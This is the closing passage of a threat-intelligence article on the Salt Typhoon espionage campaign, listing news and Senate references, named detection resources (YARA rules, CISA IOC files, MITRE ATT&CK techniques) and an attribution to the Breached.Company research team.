- Ars Technica: FBI Offers $10 Million for Salt Typhoon Information - April 25, 2025
- Senate Commerce Committee: Cantwell Demands Carrier Accountability - February 3, 2026
Detection Resources
- Trend Micro YARA Rules for Earth Estries
- CISA IOC STIX Files (JSON and XML)
- MITRE ATT&CK - Salt Typhoon Techniques
This article was researched and written by the Breached.Company intelligence team to help security professionals understand and defend against the Salt Typhoon threat. For questions, additional IOCs, or to share intelligence, contact our research team.